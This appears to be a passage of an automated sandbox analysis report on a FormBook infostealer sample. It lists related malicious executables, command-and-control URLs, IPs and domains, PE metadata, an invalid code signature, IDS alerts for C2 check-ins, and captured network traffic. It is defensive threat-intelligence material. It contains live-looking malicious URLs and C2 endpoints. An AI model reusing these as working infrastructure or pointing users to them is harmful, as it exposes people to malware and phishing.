                                                  • www.home-repair-contractors-kfm.xyz/btrd/?OR-TJfQ=eVMlJIJ+geaZUobAArdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImMamgZk5Kk8mIb1RaQ==&2dc=kvXd-rKHCF
                                                  mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                                  • www.42bomclub.com/zq0e/
                                                  SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                                                  • www.42bomclub.com/zq0e/
                                                  Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                                  • www.mommysdaycare.net/k4dg/
                                                  34.149.87.45Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                                                  • www.sfumaturedamore.net/45er/?op=K2MPclUpT0JDpb&jzrtSdh=5wac7XqF5C9tO/nu2iKY7UFJ2BpGPyVCoaFtUPotinLFY92r5LCsbso9vos8/jtTwdb8kOP9aA==
                                                  iY.exeGet hashmaliciousFormBookBrowse
                                                  • www.slow-man.com/ss63/?tZUX=+NZTuPPY/oeUIRAuFrVBxY7clWbjoDnyDgHMPE4tMjWGhJuUs1HH/Uo/WPSJAV9Bim89&Unw0O=GTgtavpHB8N4TP4
                                                  hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                                                  • www.ar-robotics.com/8gw5/
                                                  fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                                                  • www.ar-robotics.com/8gw5/
                                                  pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                  • www.magnoliahairandco.com/fkxp/
                                                  tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                                  • www.ar-robotics.com/8gw5/
                                                  Invitation to Tender (ITT) - TED-DRL-2024-024 - Supply PDF.exeGet hashmaliciousFormBookBrowse
                                                  • www.citizens4daniellee.com/38gc/?-ZeHznp=11VPRfYnqOA19NgIQbS33B+HdkvJIujSOwILAFGQAEF0SeNj9OqkcReekQ+de2CnKCCJ&NjopTP=llxdA
                                                  2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                                                  • www.ar-robotics.com/dhra/
                                                  CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                  • www.magnoliahairandco.com/fkxp/
                                                  PR-ZWL 07364G49574(Revised PO).exeGet hashmaliciousFormBookBrowse
                                                  • www.aretikokkoris.com/bnz5/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  td-ccm-neg-87-45.wixdns.netSwift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 34.149.87.45
                                                  Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                                                  • 34.149.87.45
                                                  https://www.facnma.orgGet hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  https://www.onedrive-strabag.com/Get hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  https://bitbucket.oreaillyauto.com/Get hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  http://dllavy.wixsite.com/mybt-view/Get hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  https://peringatanfb772.wixsite.com/mysiteGet hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  http://trace.usafilesamrenewal.com/analytics/YkZriEv3qM7BWIziU7JcA9c0576GuKdK/clicked?url=https://shopusafiling.com/Get hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  http://h3200457.wixsite.com/my-site-1/Get hashmaliciousUnknownBrowse
                                                  • 34.149.87.45
                                                  original.emlGet hashmaliciousHTMLPhisherBrowse
                                                  • 34.149.87.45
                                                  pa94nj5r.vakcloud.comunexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 14.128.41.166
                                                  Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 14.128.41.164
                                                  payment-order90094983.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 202.79.175.217
                                                  googleyou.qqdns.shopHSBC Payment Advice.img.exeGet hashmaliciousFormBookBrowse
                                                  • 34.96.176.101
                                                  ROVM7fV8KR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 34.96.176.101
                                                  WvwNJkZ8jcQuUnb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 34.96.176.101
                                                  pD6GwnXo7Mm3J8u.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 34.96.176.101

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  BODIS-NJUSfactura.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                                  • 199.59.243.226
                                                  rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  http://sdfa.liveblog365.com/ares/hades.txtGet hashmaliciousUnknownBrowse
                                                  • 199.59.243.225
                                                  LinuxTF.elfGet hashmaliciousUnknownBrowse
                                                  • 199.59.243.226
                                                  eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  ATGS-MMD-ASUShttps://u6071375.ct.sendgrid.net/ls/click?upn=u001.jNebCYco-2BJgBMGJDj1kJWP39IKixFvDeSBij1PLovvXT0hkMSWjEhuIEgwQ-2F309CwGFmoY6-2Bl45VLW7K9Sd8-2Fg-3D-3Dm1D8_bgsmQmhs-2BDkrnAcljUiGIti1-2F3303-2FliL2Lyr586-2FN9rAlBFKILfRyjObk6Iz5-2FtMSxC-2FhiWOZXbqnmzeZXBiy3CSpPIYxz2-2BTcFMtFX6z-2FFKaL9cuMNNsd9H8Soth9M-2BiGwIhw5kRyphke6a8RYyV0rtdDONsX7lNk6Cr796v-2FIJZ8nzBJ39o6b-2FDySakEM-2B9nvScrgUWzDogJp7LxfPQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                  • 34.160.63.108
                                                  https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=Get hashmaliciousUnknownBrowse
                                                  • 34.160.236.64
                                                  Swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 34.149.87.45
                                                  watchdog.elfGet hashmaliciousMiraiBrowse
                                                  • 34.18.178.200
                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                  • 57.62.103.186
                                                  watchdog.elfGet hashmaliciousMiraiBrowse
                                                  • 34.190.213.169
                                                  https://supp-review9482.eu/Get hashmaliciousUnknownBrowse
                                                  • 34.36.178.232
                                                  http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
                                                  • 34.149.50.64
                                                  https://swans-muffin-1id4964-7304421.netlify.app/formGet hashmaliciousUnknownBrowse
                                                  • 34.149.250.58
                                                  https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                                  • 34.149.250.58
                                                  BCPL-SGBGPNETGlobalASNSG998_popxinv_Installer.exeGet hashmaliciousXWormBrowse
                                                  • 134.122.174.169
                                                  h8N9qpyRAPaiitu.exeGet hashmaliciousFormBookBrowse
                                                  • 14.128.41.167
                                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 118.107.53.143
                                                  Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                                                  • 118.107.56.38
                                                  Dtjgu2gHw0.elfGet hashmaliciousMiraiBrowse
                                                  • 137.220.211.71
                                                  cEEsFMSdw8.elfGet hashmaliciousMiraiBrowse
                                                  • 118.107.53.144
                                                  PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 118.107.56.40
                                                  GOoY5QBqvC.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 118.107.53.127
                                                  https://whastappg.top/Get hashmaliciousUnknownBrowse
                                                  • 216.224.126.59
                                                  666.exeGet hashmaliciousUnknownBrowse
                                                  • 143.92.49.135
                                                  PONYNETUSexecute_and_cleanup.shGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  ReMX69vsiG.elfGet hashmaliciousUnknownBrowse
                                                  • 205.185.124.200
                                                  0S3wxWer8x.elfGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  ausNOyj9by.elfGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  W4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
                                                  • 209.141.53.247
                                                  209.141.57.51-x86-2024-07-01T10_22_46.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 209.141.57.51
                                                  209.141.57.51-mips-2024-07-01T10_22_47.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 209.141.57.51
                                                  BVwjyOTKbI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 107.189.29.207

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hOe2JrpIAE.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oIHKx1qHitHo6hAHKze0HJ
                                                  MD5:3B0A5F209832627405ECFECB3F0D87AD
                                                  SHA1:E808346EA598D760F1835D80B55BCF3484F50F8C
                                                  SHA-256:3A087D73802A278BC76F379CDFB9C93501DAFFE4FEE541A7EF40F8EEC9CD9AE9
                                                  SHA-512:5F890540FD0F79C6855A0AB2E8943247FAFFB22C66B8CD0018497BEBDE28F61EC5C3B0D358FA0A4B6C78130F2375A1CEBB05B741C2D8C4159F3D75D835EC8998
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.957071293577967
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:hOe2JrpIAE.exe
                                                  File size:674'824 bytes
                                                  MD5:21a8497522de5b8b12067fca910e0469
                                                  SHA1:314794ef8b3b0fc2f1efc2a68e04caa0e371ff25
                                                  SHA256:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6
                                                  SHA512:565e2558a19a9c5655e992bb09c318e00b9cf302dd1c86e889798c97066876cd46f4da9b47ddea0ea2386dd904d9e7cf2c920fbbbc9fe106d582c34b2d3dbac0
                                                  SSDEEP:12288:AbAASYMjhvPie/rByY7777777777777IxjJpI4SrsHIeCf6Xvfkn6lDNvkxm/GuK:AbAASYMFniyy7gQJQ686lDYmlpqSTpw
                                                  TLSH:C0E42327327CE851DAACCB320289519253B2B2139566EBC45CC31DED6DEA7B03B00F57
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.Bf..............0.............B(... ...@....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4a2842
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6642DF2A [Tue May 14 03:48:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Authenticode Signature

                                                  Signature Valid:false
                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
                                                  Not Before, Not After
                                                  • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                  Subject Chain
                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                  Version:3
                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                  Serial:7C1118CBBADC95DA3752C46E47A27438

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  xor al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr fs:[eax], al
                                                  add ah, dh
                                                  add dword ptr [eax], eax
                                                  add al, ch
                                                  add eax, dword ptr [eax]
                                                  add al, dl
                                                  pop es
                                                  add byte ptr [eax], al
                                                  mov byte ptr [ebx], dl
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa27ef0x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x694.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa16000x3608
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xa032c0x54.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xa08680xa0a00f189f8656cd460aa54cda17f8eb91c13False0.9559870500972762data7.965298829702422IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa40000x6940x800d8e7bca23a395eb59e077c61fb5f9c3eFalse0.3662109375data3.6315960781360115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa60000xc0x200beee201bcfd8a8289801fa229ca81670False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0xa40900x404data0.4280155642023346
                                                  RT_MANIFEST0xa44a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  07/03/24-14:51:07.057746TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.5199.59.243.226
                                                  07/03/24-14:53:09.934739TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.552.60.87.163
                                                  07/03/24-14:53:30.424657TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.534.92.194.225
                                                  07/03/24-14:53:50.846445TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.53.33.130.190
                                                  07/03/24-14:52:08.288538TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.534.149.87.45
                                                  07/03/24-14:51:27.802913TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.514.128.41.165
                                                  07/03/24-14:52:28.804978TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.53.33.130.190
                                                  07/03/24-14:50:47.686112TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5162.244.93.3

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 3, 2024 14:50:47.681068897 CEST4971980192.168.2.5162.244.93.3
                                                  Jul 3, 2024 14:50:47.685971022 CEST8049719162.244.93.3192.168.2.5
                                                  Jul 3, 2024 14:50:47.686041117 CEST4971980192.168.2.5162.244.93.3
                                                  Jul 3, 2024 14:50:47.686111927 CEST4971980192.168.2.5162.244.93.3
                                                  Jul 3, 2024 14:50:47.691078901 CEST8049719162.244.93.3192.168.2.5
                                                  Jul 3, 2024 14:50:48.172086954 CEST4971980192.168.2.5162.244.93.3
                                                  Jul 3, 2024 14:50:48.179862976 CEST8049719162.244.93.3192.168.2.5
                                                  Jul 3, 2024 14:50:48.179924965 CEST4971980192.168.2.5162.244.93.3
                                                  Jul 3, 2024 14:51:07.052643061 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.057593107 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:07.057656050 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.057745934 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.062591076 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:07.511368990 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:07.511396885 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:07.511569023 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.511569023 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.511851072 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:07.511935949 CEST4972080192.168.2.5199.59.243.226
                                                  Jul 3, 2024 14:51:07.517030001 CEST8049720199.59.243.226192.168.2.5
                                                  Jul 3, 2024 14:51:27.794821024 CEST4972180192.168.2.514.128.41.165
                                                  Jul 3, 2024 14:51:27.799916983 CEST804972114.128.41.165192.168.2.5
                                                  Jul 3, 2024 14:51:27.802818060 CEST4972180192.168.2.514.128.41.165
                                                  Jul 3, 2024 14:51:27.802912951 CEST4972180192.168.2.514.128.41.165
                                                  Jul 3, 2024 14:51:27.807775021 CEST804972114.128.41.165192.168.2.5
                                                  Jul 3, 2024 14:51:28.315493107 CEST4972180192.168.2.514.128.41.165
                                                  Jul 3, 2024 14:51:28.368556023 CEST804972114.128.41.165192.168.2.5
                                                  Jul 3, 2024 14:51:28.380311012 CEST804972114.128.41.165192.168.2.5
                                                  Jul 3, 2024 14:51:28.383835077 CEST4972180192.168.2.514.128.41.165
                                                  Jul 3, 2024 14:52:08.281238079 CEST4972280192.168.2.534.149.87.45
                                                  Jul 3, 2024 14:52:08.286168098 CEST804972234.149.87.45192.168.2.5
                                                  Jul 3, 2024 14:52:08.288537979 CEST4972280192.168.2.534.149.87.45
                                                  Jul 3, 2024 14:52:08.288537979 CEST4972280192.168.2.534.149.87.45
                                                  Jul 3, 2024 14:52:08.293364048 CEST804972234.149.87.45192.168.2.5
                                                  Jul 3, 2024 14:52:08.758635044 CEST804972234.149.87.45192.168.2.5
                                                  Jul 3, 2024 14:52:08.758776903 CEST4972280192.168.2.534.149.87.45
                                                  Jul 3, 2024 14:52:08.758829117 CEST804972234.149.87.45192.168.2.5
                                                  Jul 3, 2024 14:52:08.758928061 CEST4972280192.168.2.534.149.87.45
                                                  Jul 3, 2024 14:52:08.763606071 CEST804972234.149.87.45192.168.2.5
                                                  Jul 3, 2024 14:52:28.799663067 CEST4972380192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:52:28.804783106 CEST80497233.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:52:28.804860115 CEST4972380192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:52:28.804977894 CEST4972380192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:52:28.809865952 CEST80497233.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:52:29.270483971 CEST80497233.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:52:29.270582914 CEST80497233.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:52:29.270631075 CEST4972380192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:52:29.270689964 CEST4972380192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:52:29.275525093 CEST80497233.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:53:50.841384888 CEST4972680192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:53:50.846333981 CEST80497263.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:53:50.846405983 CEST4972680192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:53:50.846445084 CEST4972680192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:53:50.851325035 CEST80497263.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:53:51.307919025 CEST80497263.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:53:51.308060884 CEST80497263.33.130.190192.168.2.5
                                                  Jul 3, 2024 14:53:51.308078051 CEST4972680192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:53:51.308140039 CEST4972680192.168.2.53.33.130.190
                                                  Jul 3, 2024 14:53:51.312975883 CEST80497263.33.130.190192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 3, 2024 14:50:26.064101934 CEST5400153192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:50:26.083115101 CEST53540011.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:50:47.472589970 CEST5736253192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:50:47.680409908 CEST53573621.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:51:06.767313004 CEST5210453192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:51:07.051964998 CEST53521041.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:51:27.316390991 CEST5186753192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:51:27.790054083 CEST53518671.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:51:47.752373934 CEST5111753192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:51:48.121083021 CEST53511171.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:52:08.236404896 CEST5877953192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:52:08.276448965 CEST53587791.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:52:28.785418034 CEST6527353192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:52:28.798777103 CEST53652731.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:52:49.220643044 CEST4928853192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:52:49.432316065 CEST53492881.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:53:09.657294989 CEST5331853192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:53:09.922772884 CEST53533181.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:53:30.235338926 CEST6072753192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:53:30.412910938 CEST53607271.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:53:50.813308954 CEST5260053192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:53:50.840811014 CEST53526001.1.1.1192.168.2.5
                                                  Jul 3, 2024 14:54:13.047549009 CEST5304853192.168.2.51.1.1.1
                                                  Jul 3, 2024 14:54:13.308358908 CEST53530481.1.1.1192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 3, 2024 14:50:26.064101934 CEST192.168.2.51.1.1.10xe5f5Standard query (0)www.theburnscleanteam.comA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:50:47.472589970 CEST192.168.2.51.1.1.10xb1d5Standard query (0)www.tiensbangladesh.netA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:51:06.767313004 CEST192.168.2.51.1.1.10x7108Standard query (0)www.shopusuniform.comA (IP address)IN (0x0001)false
